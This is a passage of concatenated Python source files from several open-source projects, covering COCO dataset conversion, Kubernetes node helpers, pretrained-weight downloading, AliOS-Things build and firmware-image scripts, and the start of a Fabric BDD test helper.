if categories_total:
categories[i["category_id"]]["name"] = categories_total[i["category_id"]-1]["name"]
categories[i["category_id"]]["supercategory"] = categories_total[i["category_id"]-1]["supercategory"]
if "area" not in i:
if i["segmentation"]:
i["area"] = int(PolygonArea(segmentationToCorner((i["segmentation"][0]))))
if i["bbox"]:
i["area"] = i["bbox"][2] * i["bbox"][3]
if "iscrowd" not in i:
i["iscrowd"] = 0
coco["images"].extend(json_dict["images"])
coco["annotations"].extend(json_dict["annotations"])
# source_path = os.path.join(json_path, 'images', "{}.jpg".format(ImgID))
# if args and not args.ignore_image:
# shutil.copyfile(source_path, os.path.join(coco_image_path, "{}.jpg".format(new_image_id)))
coco["categories"] = list(map(lambda x:x[1],sorted([[k,v] for k,v in categories.items()],key=lambda x:x[0])))
with open(coco_file_path, "w") as f:
f.write(json.dumps(coco, indent=4, separators=(',', ':')))
with open(os.path.join(os.path.dirname(coco_file_path),"class_names.json"), "w") as f:
f.write(json.dumps(coco["categories"], indent=4, separators=(',', ':')))
def judge_datasets_is_private(projectId,datasetId):
ret = False
path = os.path.join(config["data_platform_path"], "private/account/%s/membership.json" % (projectId))
if os.path.exists(path):
with open(path, "r") as f:
infos = json.loads(f.read())
ret = infos["dataSets"][datasetId]["isPrivate"]
return ret
def find_dataset_creator(projectId):
path = os.path.join(config["data_platform_path"], "private/account/index.json")
with open(path, "r") as f:
infos = json.loads(f.read())
creator = infos[projectId]["creator"]
return creator
def find_dataset_bind_path(projectId,datasetId,isPrivate=False):
path = os.path.join(config["data_platform_path"], "private/account/%s/membership.json" % (projectId))
with open(path, "r") as f:
infos = json.loads(f.read())
ret = infos["dataSets"][datasetId]["dataSetPath"]
# return re.sub("^/data", "/dlwsdata/storage",ret) if not isPrivate else re.sub("^/home", "/dlwsdata/work",ret)
return ret
def DoDataConvert():
dataHandler = DataHandler()
jobs = dataHandler.getConvertList(targetStatus="queued")
for oneJob in jobs:
if oneJob["type"] == "image" and oneJob["targetFormat"]=="coco":
try:
list_path = os.path.join(config["data_platform_path"], "public/tasks/%s" % (oneJob["datasetId"]))
json_path = os.path.join(config["data_platform_path"], "private/tasks/%s/%s" % (oneJob["datasetId"], oneJob["projectId"]))
category_path = os.path.join(config["data_platform_path"], "private/tasks/%s/%s/category.json" % (oneJob["datasetId"],oneJob["projectId"]))
if judge_datasets_is_private(oneJob["projectId"],oneJob["datasetId"]):
username =find_dataset_creator(oneJob["projectId"])
coco_base_path = os.path.join(config["storage-mount-path"], "work/%s/data_platform/%s/%s/format_coco" % (username,oneJob["projectId"],oneJob["datasetId"]))
coco_file_path = os.path.join(coco_base_path, "annotations/instance.json")
show_coco_file_path = "/home/%s/data_platform/%s/%s" % (username,oneJob["projectId"],oneJob["datasetId"])
mkdirs(os.path.dirname(coco_file_path))
os.system("ln -s %s %s" %(find_dataset_bind_path(oneJob["projectId"],oneJob["datasetId"],isPrivate=True),os.path.join(coco_base_path,"images")))
else:
coco_base_path = os.path.join(config["storage-mount-path"],"storage/data_platform/%s/%s/format_coco" % (oneJob["projectId"],oneJob["datasetId"]))
coco_file_path = os.path.join(coco_base_path,"annotations/instance.json")
show_coco_file_path = "/data/data_platform/%s/%s" % (oneJob["projectId"],oneJob["datasetId"])
mkdirs(os.path.dirname(coco_file_path))
os.system("ln -s %s %s" % (find_dataset_bind_path(oneJob["projectId"],oneJob["datasetId"]), os.path.join(coco_base_path,"images")))
logging.info("=============start convert to format %s" % (oneJob["targetFormat"]))
merge_json_to_coco_dataset(list_path,json_path,coco_file_path,category_path=category_path)
dataHandler.updateConvertStatus("finished",oneJob["id"],coco_file_path)
insert_status_to_dataset(oneJob["datasetId"], oneJob["projectId"],"finished",show_coco_file_path)
logging.info("=============convert to format %s done" % (oneJob["targetFormat"]))
except Exception as e:
logging.exception(e)
dataHandler.updateConvertStatus("error", oneJob["id"],e)
insert_status_to_dataset(oneJob["datasetId"], oneJob["projectId"],"error")
def Run():
register_stack_trace_dump()
create_log()
logger.info("start to DoDataConvert...")
while True:
update_file_modification_time("DataConvert")
with manager_iteration_histogram.labels("data_convert").time():
try:
DoDataConvert()
except Exception as e:
logger.exception("do dataConvert failed")
time.sleep(1)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--port", "-p", help="port of exporter", type=int, default=9209)
args = parser.parse_args()
setup_exporter_thread(args.port)
Run()
```
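For reference, here is a minimal sketch of the per-dataset layout that `merge_json_to_coco_dataset` above consumes: `list.json` enumerates the image ids (and optional suffixes), and each image has its own one-image COCO fragment under `images/`. All directory names and label values below are illustrative placeholders, not paths used by the real platform.
```python
import json
import os
demo = "demo_dataset"
os.makedirs(os.path.join(demo, "images"), exist_ok=True)
# list.json drives the conversion loop (data.get("ImgIDs") / data.get("suffixs") above).
with open(os.path.join(demo, "list.json"), "w") as f:
    json.dump({"ImgIDs": ["img_0001"], "suffixs": [".jpg"]}, f)
# Each per-image file is a one-image COCO fragment that the loop merges into instance.json.
fragment = {
    "images": [{"file_name": "img_0001.jpg", "id": "img_0001", "width": 640, "height": 480}],
    "annotations": [{"image_id": "img_0001", "category_id": 1, "category_name": "person",
                     "bbox": [10, 20, 100, 200], "segmentation": []}],
}
with open(os.path.join(demo, "images", "img_0001.json"), "w") as f:
    json.dump(fragment, f)
# merge_json_to_coco_dataset(demo, demo, os.path.join(demo, "instance.json"),
#                            category_path=os.path.join(demo, "category.json"))
# would then write instance.json plus class_names.json next to it.
```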
#### File: RepairManager/utils/k8s_util.py
```python
import subprocess
import logging
from kubernetes import client, config
kubernetes_config_file = '/etc/kubernetes/restapi-kubeconfig.yaml'
def cordon_node(node_name, dry_run=True):
args = ['kubectl', 'cordon', node_name]
if dry_run:
args.append('--dry-run')
try:
output = subprocess.check_output(args, stderr=subprocess.STDOUT)
logging.info(output.decode())
return output.decode()
except subprocess.CalledProcessError as e:
logging.exception(f'Exception attempting to cordon node {node_name}')
return e.output.decode()
def is_node_cordoned(node_info, node_name):
for node in node_info.items:
for address in node.status.addresses:
if address.type == 'Hostname' and address.address == node_name:
return node.spec.unschedulable
logging.warning(f"Could not find node with hostname {node_name}")
def list_node():
config.load_kube_config()
api_instance = client.CoreV1Api()
return api_instance.list_node()
def list_pod_for_all_namespaces():
config.load_kube_config()
api_instance = client.CoreV1Api()
return api_instance.list_pod_for_all_namespaces()
def list_namespaced_pod(namespace):
config.load_kube_config(config_file=kubernetes_config_file)
api_instance = client.CoreV1Api()
return api_instance.list_namespaced_pod(namespace)
def get_job_info_from_nodes(nodes, portal_url, cluster_name):
pods = list_namespaced_pod("default")
jobs = {}
for pod in pods.items:
if pod.metadata and pod.metadata.labels:
if 'jobId' in pod.metadata.labels and 'userName' in pod.metadata.labels:
if pod.spec.node_name in nodes:
job_id = pod.metadata.labels['jobId']
user_name = pod.metadata.labels['userName']
node_name = pod.spec.node_name
vc_name = pod.metadata.labels['vcName']
if job_id not in jobs:
jobs[job_id] = {
'user_name': user_name,
'node_names': {node_name},
'vc_name': vc_name,
'job_link': f'https://{portal_url}/job/{vc_name}/{cluster_name}/{job_id}'}
else:
jobs[job_id]['node_names'].add(node_name)
return jobs
def get_node_address_info():
# map InternalIP to Hostname
node_info = list_node()
address_map = {}
if node_info:
for node in node_info.items:
internal_ip = None
hostname = None
for address in node.status.addresses:
if address.type == 'InternalIP':
internal_ip = address.address
if address.type == 'Hostname':
hostname = address.address
address_map[internal_ip] = hostname
logging.debug(f'node address map: {address_map}')
return address_map
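# Minimal manual-test hook (added as an illustration, not part of the original module);
# it assumes kubectl access and a valid local kubeconfig are available.
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    print(get_node_address_info())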
``` |
{
"source": "jinlmsft/Detectron.pytorch",
"score": 2
} |
#### File: Detectron.pytorch/tools/download_imagenet_weights.py
```python
import argparse
import os
import requests
#from argparse_color_formatter import ColorHelpFormatter
#from colorama import init, Fore
import _init_paths # pylint: disable=unused-import
from core.config import cfg
def parse_args():
"""Parser command line argumnets"""
parser = argparse.ArgumentParser() #(formatter_class=ColorHelpFormatter)
parser.add_argument('--output_dir', help='Directory to save downloaded weight files',
default=os.path.join(cfg.DATA_DIR, 'pretrained_model'))
parser.add_argument('-t', '--targets', nargs='+', metavar='file_name',
help='Files to download. Allowed values are: ',
choices=list(PRETRAINED_WEIGHTS.keys()),
default=list(PRETRAINED_WEIGHTS.keys()))
return parser.parse_args()
# ---------------------------------------------------------------------------- #
# Mapping from filename to google drive file_id
# ---------------------------------------------------------------------------- #
PRETRAINED_WEIGHTS = {
'resnet50_caffe.pth': '1wHSvusQ1CiEMc5Nx5R8adqoHQjIDWXl1',
'resnet101_caffe.pth': '1x2fTMqLrn63EMW0VuK4GEa2eQKzvJ_7l',
'resnet152_caffe.pth': '1NSCycOb7pU0KzluH326zmyMFUU55JslF',
'vgg16_caffe.pth': '19UphT53C0Ua9JAtICnw84PPTa3sZZ_9k',
}
# ---------------------------------------------------------------------------- #
# Helper functions for downloading a file from Google Drive
# ---------------------------------------------------------------------------- #
def download_file_from_google_drive(id, destination):
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params={'id': id}, stream=True)
token = get_confirm_token(response)
if token:
params = {'id': id, 'confirm': token}
response = session.get(URL, params=params, stream=True)
save_response_content(response, destination)
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
def main():
args = parse_args()
for filename in args.targets:
file_id = PRETRAINED_WEIGHTS[filename]
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
destination = os.path.join(args.output_dir, filename)
download_file_from_google_drive(file_id, destination)
        print('Downloaded {} to {}'.format(filename, destination))
if __name__ == "__main__":
main()
``` |
{
"source": "jinlongliu/AliOS-Things",
"score": 3
} |
#### File: AliOS-Things/build/fileformat.py
```python
import os, sys, re, platform
def list_files(dir_path):
file_list = [];
for root, dirs, files in os.walk(dir_path):
for f in files:
if (os.path.splitext(f)[1] == ".h" or os.path.splitext(f)[1] == ".c" or os.path.splitext(f)[1] == ".mk"):
file_list.append(os.path.join(root, f))
return file_list
def main():
if len(sys.argv) != 2:
print "Dir args is empty, Enter the path to be processed!"
os._exit(0)
filedir = sys.argv[1]
print filedir.strip()
sys_version = platform.version()
if "Ubuntu" in sys_version:
os.environ['syscmd'] = str("fromdos")
elif "CentOS" in sys_version:
os.environ['syscmd'] = str("dos2unix")
else:
print "Not find the system version!"
os._exit(0)
file_list = list_files(filedir)
for f in file_list:
os.environ['file'] = str(f)
os.system('$syscmd $file')
if __name__ == '__main__':
main()
```
#### File: build/scripts/keil.py
```python
import os
import sys
import string
import xml.etree.ElementTree as etree
import config_mk
from xml.etree.ElementTree import SubElement
from xml_format import gen_indent
from config_mk import Projects
def file_type_value(fn):
if fn.endswith('.h'):
return 5
if fn.endswith('.s') or fn.endswith('.S'):
return 2
if fn.endswith('.lib') or fn.endswith('.a'):
return 4
if fn.endswith('.cpp') or fn.endswith('.cxx'):
return 8
if fn.endswith('.c') or fn.endswith('.C'):
return 1
return 5
# ProjectFiles is used to remove files that share the same name
# add files
def add_group(parent, name, files, project_path):
cur_encoding = sys.getfilesystemencoding()
group = SubElement(parent, 'Group')
group_name = SubElement(group, 'GroupName')
group_name.text = name
for f in files:
files = SubElement(group, 'Files')
file = SubElement(files, 'File')
file_name = SubElement(file, 'FileName')
name = os.path.basename(f)
file_name.text = name.decode(cur_encoding)
file_type = SubElement(file, 'FileType')
file_type.text = '%d' % file_type_value(name)
file_path = SubElement(file, 'FilePath')
file_path.text = (aos_relative_path + f).decode(cur_encoding)
return group
# TODO: automate this per-MCU configuration
def changeItemForMcu( tree ):
Path_TargetArmAds = 'Targets/Target/TargetOption/TargetArmAds/'
ScatterFile = tree.find(Path_TargetArmAds + 'LDads/ScatterFile')
IRAM1Size = tree.find(Path_TargetArmAds + 'ArmAdsMisc/OnChipMemories/OCR_RVCT9/Size')
IRAM2Size = tree.find(Path_TargetArmAds + 'ArmAdsMisc/OnChipMemories/OCR_RVCT10/Size')
FlashSize = tree.find(Path_TargetArmAds + 'ArmAdsMisc/OnChipMemories/OCR_RVCT4/Size')
if 'starterkit' in buildstring:
ScatterFile.text = '..\..\..\..\platform\mcu\stm32l4xx\src\STM32L433RC-Nucleo\STM32L433.sct'
if 'stm32l432' in buildstring:
ScatterFile.text = '..\..\..\..\platform\mcu\stm32l4xx\src\STM32L432KC-Nucleo\STM32L432.sct'
if 'stm32l053' in buildstring:
ScatterFile.text = '..\..\..\..\\board\stm32l053r8-nucleo\STM32L053.sct'
IRAM1Size.text='0x2000'
IRAM2Size.text=''
FlashSize.text='0x10000'
if 'stm32l031' in buildstring:
ScatterFile.text = '..\..\..\..\\board\stm32l031k6-nucleo\STM32L031.sct'
IRAM1Size.text='0x2000'
IRAM2Size.text=''
FlashSize.text='0x8000'
# change keywords in the project file; TODO: automate this
def ModifyProjString( projString ):
if 'starterkit' in buildstring:
projString = projString.replace('STM32L475VGTx','STM32L433RCTx')
if 'stm32l432' in buildstring:
projString = projString.replace('STM32L475VGTx','STM32L432KCTx')
if 'stm32l053' in buildstring:
projString = projString.replace('STM32L475VGTx','STM32L053R8Tx')
projString = projString.replace('STM32L4xx_1024','STM32L0xx_64')
projString = projString.replace('STM32L4xx','STM32L0xx')
projString = projString.replace('stm32l4xx','stm32l0xx')
projString = projString.replace('STM32L4x5', 'STM32L053x')
projString = projString.replace('IRAM(0x20000000,0x00018000) IRAM2(0x10000000,0x00008000) IROM(0x08000000,0x00100000) \
CPUTYPE("Cortex-M4") FPU2 CLOCK(12000000) ELITTLE', 'IRAM(0x20000000-0x20001FFF) IROM(0x8000000-0x800FFFF) CLOCK(8000000) \
CPUTYPE("Cortex-M0+")')
projString = projString.replace('DCM.DLL','DARMCM1.DLL')
projString = projString.replace('-MPU','')
projString = projString.replace('-pCM4','-pCM0+')
projString = projString.replace('TCM.DLL','TARMCM1.DLL')
if 'stm32l031' in buildstring:
projString = projString.replace('STM32L475VGTx','STM32L031K6Tx')
projString = projString.replace('STM32L4xx_1024','STM32L0xx_32')
projString = projString.replace('STM32L4xx','STM32L0xx')
projString = projString.replace('stm32l4xx','stm32l0xx')
projString = projString.replace('STM32L4x5', 'STM32L031x')
projString = projString.replace('IRAM(0x20000000,0x00018000) IRAM2(0x10000000,0x00008000) IROM(0x08000000,0x00100000) \
CPUTYPE("Cortex-M4") FPU2 CLOCK(12000000) ELITTLE', 'IRAM(0x20000000-0x20001FFF) IROM(0x8000000-0x8007FFF) CLOCK(8000000) \
CPUTYPE("Cortex-M0+")')
projString = projString.replace('DCM.DLL','DARMCM1.DLL')
projString = projString.replace('-MPU','')
projString = projString.replace('-pCM4','-pCM0+')
projString = projString.replace('TCM.DLL','TARMCM1.DLL')
return projString
def gen_project(tree, target, script):
project_path = os.path.dirname(os.path.abspath(target))
root = tree.getroot()
out = file(target, 'wb')
out.write('<?xml version="1.0" encoding="UTF-8" standalone="no" ?>\n')
#change target name
TargetName = tree.find('Targets/Target/TargetName')
TargetName.text = buildstring
OutputName = tree.find('Targets/Target/TargetOption/TargetCommonOption/OutputName')
OutputName.text = buildstring
# add group
groups = tree.find('Targets/Target/Groups')
if groups is None:
groups = SubElement(tree.find('Targets/Target'), 'Groups')
groups.clear() # clean old groups
for group in script:
# don't add an empty group
if len(group['src']) != 0:
group_tree = add_group(groups, group['name'], group['src'], project_path)
# add GroupOption
GroupOption = SubElement(group_tree, 'GroupOption')
GroupArmAds = SubElement(GroupOption, 'GroupArmAds')
Cads = SubElement(GroupArmAds, 'Cads')
VariousControls = SubElement(Cads, 'VariousControls')
MiscControls = SubElement(VariousControls, 'MiscControls')
MiscControls.text = '--via '+opt_dir+group['name']+'.c_opts'
Aads = SubElement(GroupArmAds, 'Aads')
VariousControls = SubElement(Aads, 'VariousControls')
MiscControls = SubElement(VariousControls, 'MiscControls')
MiscControls.text = '--via '+opt_dir+group['name']+'.as_opts'
# set <OutputName>B-L475E-IOT01</OutputName>
gen_indent(root)
changeItemForMcu(tree)
projString = ModifyProjString( etree.tostring(root, encoding='utf-8') )
out.write(projString)
out.close()
def gen_main(target, script):
template_tree = etree.parse('build/scripts/template.uvprojx')
# create uvprojx file
gen_project(template_tree, target, script)
# create uvoptx file
opt_file = target.replace('.uvprojx', '.uvoptx')
opt_tree = etree.parse('build/scripts/template.uvoptx')
TargetName = opt_tree.find('Target/TargetName')
TargetName.text = buildstring
out = file(opt_file, 'wb')
projString = ModifyProjString( etree.tostring(opt_tree.getroot(), encoding='utf-8') )
out.write(projString)
out.close()
'''
Projects = [
{'name':'alicrypto',
'src':[
'a.c',
'a_1.s',
]
},
{'name':'alinkapp',
'src':[
'./app/example/alinkapp/alink_sample.c',
]
}
]
'''
#argv[1]: buildstring, eg: nano@b_l475e
buildstring = sys.argv[1]
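# e.g. invoked as: python build/scripts/keil.py nano@b_l475e (the build system passes the build string)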
proj_output_dir = 'projects/autogen/'+buildstring+'/keil_project'
#use in xml text
aos_relative_path = '../../../../'
projectPath = proj_output_dir+'/'+buildstring+'.uvprojx'
opt_dir = 'opts/'
print 'Making keil project '+buildstring
gen_main(projectPath, Projects)
print 'keil project: ' + projectPath + ' has been generated'
```
#### File: build/site_scons/scons_util.py
```python
import os, sys, json
import platform
import re
def log(msg):
sys.stdout.write(msg)
sys.stdout.flush()
def info(msg):
log("[INFO]: %s\n" % msg)
def error(msg, code=-1):
sys.stderr.write("[ERROR]: %s\n" % msg)
sys.exit(code)
def get_host_os():
host_os = platform.system()
if host_os == 'Windows':
host_os = 'Win32'
elif host_os == 'Linux':
if platform.machine().endswith('64'):
bit = '64'
else:
bit = '32'
host_os += bit
elif host_os == 'Darwin':
host_os = 'OSX'
else:
host_os = None
return host_os
def read_json(json_file):
""" Read data from json file """
data = None
if os.path.isfile(json_file):
with open(json_file, 'r') as f:
data = json.load(f)
else:
error("Can not find file: %s" % json_file)
return data
def get_config_value(keyword):
""" Get predefined value for keyword from .aos """
value = None
config_file = '.aos'
if not os.path.isfile(config_file):
return value
with open(config_file) as f:
for line in f.readlines():
m = re.match(r'^([\w+-]+)\=(.*)$', line)
if m and m.group(1) == keyword:
value = m.group(2)
return value
```
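As a quick, hedged illustration of how `get_config_value()` is meant to be used; the keyword and value below are made-up examples, and the import assumes `build/site_scons` is on `sys.path`:
```python
# Given a .aos file in the current directory containing a line such as
#   AOS_BUILD_BOARD=b_l475e
# the helper returns the value after '=' for that keyword, or None if the
# keyword (or the .aos file itself) is missing.
from scons_util import get_config_value
print(get_config_value("AOS_BUILD_BOARD"))
```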
#### File: linkkit/hal/ucube.py
```python
src =Split('''
HAL_OS_rhino.c
HAL_TCP_rhino.c
HAL_PRODUCT_rhino.c
HAL_UDP_rhino.c
HAL_Crypt_rhino.c
HAL_TLS_mbedtls.c
HAL_DTLS_mbedtls.c
HAL_AWSS_rhino.c
''')
# HAL_TLS_mbedtls.c
# HAL_DTLS_mbedtls.c
component =aos_component('iotx-hal', src)
dependencies =Split('''
security/mbedtls
utility/digest_algorithm
''')
for i in dependencies:
component.add_comp_deps(i)
global_includes =Split('''
''')
for i in global_includes:
component.add_global_includes(i)
global_macros =Split('''
COAP_DTLS_SUPPORT
''')
for i in global_macros:
component.add_global_macros(i)
includes =Split('''
''')
for i in includes:
component.add_includes(i)
cflags =Split('''
''')
for i in cflags:
component.add_cflags(i)
component.add_global_macros('')
@post_config
def alink_ilop_post_config(component):
comp_names = [comp.name for comp in aos_global_config.components]
if 'ywss4linkkit' in comp_names:
component.add_sources('HAL_AWSS_rhino.c')
alink_ilop_post_config(component)
```
#### File: esp8266/tools/gen_appbin.py
```python
import string
import sys
import os
import re
import binascii
import struct
import zlib
TEXT_ADDRESS = 0x40100000
# app_entry = 0
# data_address = 0x3ffb0000
# data_end = 0x40000000
# text_end = 0x40120000
CHECKSUM_INIT = 0xEF
chk_sum = CHECKSUM_INIT
blocks = 0
def write_file(file_name,data):
if file_name is None:
print 'file_name cannot be none\n'
sys.exit(0)
fp = open(file_name,'ab')
if fp:
fp.seek(0,os.SEEK_END)
fp.write(data)
fp.close()
else:
print '%s write fail\n'%(file_name)
def combine_bin(file_name,dest_file_name,start_offset_addr,need_chk):
global chk_sum
global blocks
if dest_file_name is None:
print 'dest_file_name cannot be none\n'
sys.exit(0)
if file_name:
fp = open(file_name,'rb')
if fp:
########## write text ##########
fp.seek(0,os.SEEK_END)
data_len = fp.tell()
if data_len:
if need_chk:
tmp_len = (data_len + 3) & (~3)
else:
tmp_len = (data_len + 15) & (~15)
data_bin = struct.pack('<II',start_offset_addr,tmp_len)
write_file(dest_file_name,data_bin)
fp.seek(0,os.SEEK_SET)
data_bin = fp.read(data_len)
write_file(dest_file_name,data_bin)
if need_chk:
for loop in range(len(data_bin)):
chk_sum ^= ord(data_bin[loop])
# print '%s size is %d(0x%x),align 4 bytes,\nultimate size is %d(0x%x)'%(file_name,data_len,data_len,tmp_len,tmp_len)
tmp_len = tmp_len - data_len
if tmp_len:
data_str = ['00']*(tmp_len)
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(dest_file_name,data_bin)
if need_chk:
for loop in range(len(data_bin)):
chk_sum ^= ord(data_bin[loop])
blocks = blocks + 1
fp.close()
else:
print '!!!Open %s fail!!!'%(file_name)
def getFileCRC(_path):
try:
blocksize = 1024 * 64
f = open(_path,"rb")
str = f.read(blocksize)
crc = 0
while(len(str) != 0):
crc = binascii.crc32(str, crc)
str = f.read(blocksize)
f.close()
except:
print 'get file crc error!'
return 0
return crc
def gen_appbin():
global chk_sum
global crc_sum
global blocks
if len(sys.argv) != 6:
print 'Usage: gen_appbin.py eagle.app.out boot_mode flash_mode flash_clk_div flash_size_map'
sys.exit(0)
elf_file = sys.argv[1]
boot_mode = sys.argv[2]
flash_mode = sys.argv[3]
flash_clk_div = sys.argv[4]
flash_size_map = sys.argv[5]
flash_data_line = 16
data_line_bits = 0xf
irom0text_bin_name = 'eagle.app.v6.irom0text.bin'
text_bin_name = 'eagle.app.v6.text.bin'
data_bin_name = 'eagle.app.v6.data.bin'
rodata_bin_name = 'eagle.app.v6.rodata.bin'
flash_bin_name ='eagle.app.flash.bin'
BIN_MAGIC_FLASH = 0xE9
BIN_MAGIC_IROM = 0xEA
data_str = ''
sum_size = 0
if os.getenv('ESP8266_NM') != None:
nm_cmd = os.getenv('ESP8266_NM')
elif os.getenv('COMPILE')=='xcc' :
nm_cmd = 'xt-nm'
else :
nm_cmd = 'xtensa-lx106-elf-nm'
cmd = '{} -g {} > eagle.app.sym'.format(nm_cmd, elf_file)
os.system(cmd)
fp = file('./eagle.app.sym')
if fp is None:
print "open sym file error\n"
sys.exit(0)
lines = fp.readlines()
fp.close()
entry_addr = None
p = re.compile('(\w*)(\sT\s)(call_user_start)$')
for line in lines:
m = p.search(line)
if m != None:
entry_addr = m.group(1)
# print entry_addr
if entry_addr is None:
print 'no entry point!!'
sys.exit(0)
data_start_addr = '0'
p = re.compile('(\w*)(\sA\s)(_data_start)$')
for line in lines:
m = p.search(line)
if m != None:
data_start_addr = m.group(1)
# print data_start_addr
rodata_start_addr = '0'
p = re.compile('(\w*)(\sA\s)(_rodata_start)$')
for line in lines:
m = p.search(line)
if m != None:
rodata_start_addr = m.group(1)
# print rodata_start_addr
# write flash bin header
#============================
# SPI FLASH PARAMS
#-------------------
#flash_mode=
# 0: QIO
# 1: QOUT
# 2: DIO
# 3: DOUT
#-------------------
#flash_clk_div=
# 0 : 80m / 2
# 1 : 80m / 3
# 2 : 80m / 4
# 0xf: 80m / 1
#-------------------
#flash_size_map=
# 0 : 512 KB (256 KB + 256 KB)
# 1 : 256 KB
# 2 : 1024 KB (512 KB + 512 KB)
# 3 : 2048 KB (512 KB + 512 KB)
# 4 : 4096 KB (512 KB + 512 KB)
# 5 : 2048 KB (1024 KB + 1024 KB)
# 6 : 4096 KB (1024 KB + 1024 KB)
#-------------------
# END OF SPI FLASH PARAMS
#============================
byte2=int(flash_mode)&0xff
byte3=(((int(flash_size_map)<<4)| int(flash_clk_div))&0xff)
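    # Worked example (illustrative values only): with flash_mode=0 (QIO),
    # flash_clk_div=0xf (80m/1) and flash_size_map=4 (4096 KB), this yields
    # byte2 = 0 & 0xff = 0x00 and byte3 = ((4 << 4) | 0xf) & 0xff = 0x4f.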
if boot_mode == '2':
# write irom bin head
data_bin = struct.pack('<BBBBI',BIN_MAGIC_IROM,4,byte2,byte3,long(entry_addr,16))
sum_size = len(data_bin)
write_file(flash_bin_name,data_bin)
# irom0.text.bin
combine_bin(irom0text_bin_name,flash_bin_name,0x0,0)
data_bin = struct.pack('<BBBBI',BIN_MAGIC_FLASH,3,byte2,byte3,long(entry_addr,16))
sum_size = len(data_bin)
write_file(flash_bin_name,data_bin)
# text.bin
combine_bin(text_bin_name,flash_bin_name,TEXT_ADDRESS,1)
# data.bin
if data_start_addr:
combine_bin(data_bin_name,flash_bin_name,long(data_start_addr,16),1)
# rodata.bin
combine_bin(rodata_bin_name,flash_bin_name,long(rodata_start_addr,16),1)
# write checksum header
sum_size = os.path.getsize(flash_bin_name) + 1
sum_size = flash_data_line - (data_line_bits&sum_size)
if sum_size:
data_str = ['00']*(sum_size)
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(flash_bin_name,data_bin)
write_file(flash_bin_name,chr(chk_sum & 0xFF))
if boot_mode == '1':
sum_size = os.path.getsize(flash_bin_name)
data_str = ['FF']*(0x10000-sum_size)
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(flash_bin_name,data_bin)
fp = open(irom0text_bin_name,'rb')
if fp:
data_bin = fp.read()
write_file(flash_bin_name,data_bin)
fp.close()
else :
print '!!!Open %s fail!!!'%(flash_bin_name)
sys.exit(0)
if boot_mode == '1' or boot_mode == '2':
all_bin_crc = getFileCRC(flash_bin_name)
if all_bin_crc < 0:
all_bin_crc = abs(all_bin_crc) - 1
else :
all_bin_crc = abs(all_bin_crc) + 1
print "bin crc: %x"%all_bin_crc
write_file(flash_bin_name,chr((all_bin_crc & 0x000000FF))+chr((all_bin_crc & 0x0000FF00) >> 8)+chr((all_bin_crc & 0x00FF0000) >> 16)+chr((all_bin_crc & 0xFF000000) >> 24))
cmd = 'rm eagle.app.sym'
os.system(cmd)
if __name__=='__main__':
gen_appbin()
```
#### File: mcu/linux/ucube.py
```python
aos_global_config.set('no_with_lwip', 1)
src = Split('''
soc/uart.c
main/arg_options.c
main/main.c
main/hw.c
main/wifi_port.c
main/ota_port.c
main/nand.c
main/vfs_trap.c
''')
global_cflags = Split('''
-m32
-std=gnu99
-Wall
-Wno-missing-field-initializers
-Wno-strict-aliasing -Wno-address
-Wno-unused-result
-lpthread
-lm
-lrt
-DDEBUG
-ggdb
''')
global_macros = Split('''
SYSINFO_PRODUCT_MODEL=\\"ALI_AOS_LINUXHOST\\"
SYSINFO_DEVICE_NAME=\\"LINUXHOST\\"
CONFIG_AOS_RHINO_MMREGION
CONFIG_YSH_CMD_DUMPSYS
CSP_LINUXHOST
CONFIG_LOGMACRO_DETAILS
CONFIG_AOS_FATFS_SUPPORT
CONFIG_AOS_FATFS_SUPPORT_MMC
CONFIG_AOS_UOTA_BREAKPOINT
''')
component = aos_mcu_component('linuximpl', '', src)
component.set_global_arch('linux')
component.add_global_cflags(*global_cflags)
component.add_global_asflags('-m32')
component.add_global_ldflags('-m32', '-lpthread', '-lm', '-lrt', '-lreadline', '-lncurses')
component.add_global_macros(*global_macros)
@post_config
def linuximpl_post_config(component):
comp_names = [comp.name for comp in aos_global_config.components]
if 'fatfs' in comp_names:
component.add_sources('main/sdmmc.c')
if 'net' in comp_names:
aos_global_config.set('LWIP', 1)
linuximpl_post_config(component)
LWIP = aos_global_config.get('LWIP')
if LWIP == 1:
lwip_src = Split('''
csp/lwip/netif/delif.c
csp/lwip/netif/fifo.c
csp/lwip/netif/list.c
csp/lwip/netif/tapif.c
csp/lwip/netif/tcpdump.c
csp/lwip/netif/tunif.c
csp/lwip/lwip_linuxhost.c
''')
for s in lwip_src:
component.add_sources(s)
### can't work end ###
if aos_global_config.app == 'yts':
src_tmp = Split('''
main/sdmmc.c
csp/lwip/netif/delif.c
csp/lwip/netif/fifo.c
csp/lwip/netif/list.c
csp/lwip/netif/tapif.c
csp/lwip/netif/tcpdump.c
csp/lwip/netif/tunif.c
csp/lwip/lwip_linuxhost.c
''')
for s in src_tmp:
component.add_sources(s)
if aos_global_config.get('osal') == 'posix':
component.add_macros("CONFIG_OSAL_POSIX")
else:
src_tmp = Split('''
soc/soc_impl.c
soc/hook_impl.c
soc/trace_impl.c
''')
for s in src_tmp:
component.add_sources(s)
component.add_comp_deps('utility/log', 'platform/arch/linux', 'osal', 'kernel/init')
component.add_global_includes('include', 'csp/lwip/include')
``` |
{
"source": "jinlongliu/fabric-alpha2",
"score": 2
} |
#### File: bddtests/steps/compose.py
```python
import os
import uuid
import bdd_test_util
from contexthelper import ContextHelper
import json
from abc import ABCMeta, abstractmethod
class ContainerData:
def __init__(self, containerName, ipAddress, envFromInspect, composeService, ports):
self.containerName = containerName
self.ipAddress = ipAddress
self.envFromInspect = envFromInspect
self.composeService = composeService
self.ports = ports
def getEnv(self, key):
envValue = None
for val in self.envFromInspect:
if val.startswith(key):
envValue = val[len(key):]
break
        if envValue is None:
raise Exception("ENV key not found ({0}) for container ({1})".format(key, self.containerName))
return envValue
class CompositionCallback:
__metaclass__ = ABCMeta
@abstractmethod
def composing(self, composition, context):
pass
@abstractmethod
def decomposing(self, composition, context):
pass
@abstractmethod
def getEnv(self, composition, context, env):
pass
class Test(CompositionCallback):
